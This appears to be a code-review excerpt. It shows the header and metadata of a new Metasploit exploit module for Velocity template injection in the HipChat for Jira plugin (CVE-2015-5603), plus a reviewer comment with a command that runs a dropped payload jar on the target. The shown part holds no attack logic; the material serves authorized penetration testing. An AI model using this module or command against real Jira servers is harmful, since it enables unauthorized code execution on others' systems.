modules/exploits/unix/webapp/jira_hipchat_template.rb

```diff
@@ -0,0 +1,447 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'json'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Atlassian HipChat for Jira Plugin Velocity Template Injection",
+      'Description'    => %q{
+        Atlassian Hipchat is a web service for internal instant messaging. A plugin is available
+        for Jira that allows team collibration at real time. A message can be used to inject Java
+        code into a Velocity template, and gain code exeuction as Jira. Authentication is required
+        to exploit this vulnerability, and you must make sure the account you're using isn't
+        protected by captcha.
+
+        HipChat for Jira plugin versions between 1.3.2 and 6.30.0 are affected. Jira versions
+        between 6.3.5 and 6.4.10 are also affected by default, because they were bundled with
+        a vulnerable copy of HipChat.
+
+        When using the check command, if you supply a valid username and password, the module
+        will be able to trigger the bug and check more accurately. If not, it falls back to
+        passive, which can only tell if the target is running on a Jira version that is bundled
+        with a vulnerable copy of Hipchat by default, which is less reliable.
+
+        This vulnerability was originally discovered internally by Atlassian.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Chris Wood', # PoC
+          'sinn3r'      # Metasploit
+        ],
+      'References'     =>
+        [
+          [ 'CVE', '2015-5603' ],
+          [ 'EDB', '38551' ],
+          [ 'BID', '76698' ],
+          [ 'URL', 'https://confluence.atlassian.com/jira/jira-and-hipchat-for-jira-plugin-security-advisory-2015-08-26-776650785.html' ]
+        ],
+      'Platform'       => 'linux',
```

Comment:
@jvazquez-r7 Ok, this one works:

```
/opt/atlassian/jira/jre/bin/java -jar /tmp/payload.raw
```

But I have to guess the java path... so.... I still need to the extra step of checking the OS name and return the correct java path, and not rely on the system one.